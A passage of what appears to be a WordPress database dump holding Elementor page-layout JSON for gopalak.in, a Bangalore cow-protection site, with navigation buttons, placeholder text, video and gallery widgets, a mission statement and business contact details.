Type\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9314,1597,'_elementor_page_assets','a:0:{}'),(9317,1598,'_elementor_edit_mode','builder'),(9318,1598,'_elementor_template_type','wp-page'),(9319,1598,'_elementor_version','3.7.8'),(9320,1598,'_wp_page_template','elementor_canvas'),(9321,1598,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adobt\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\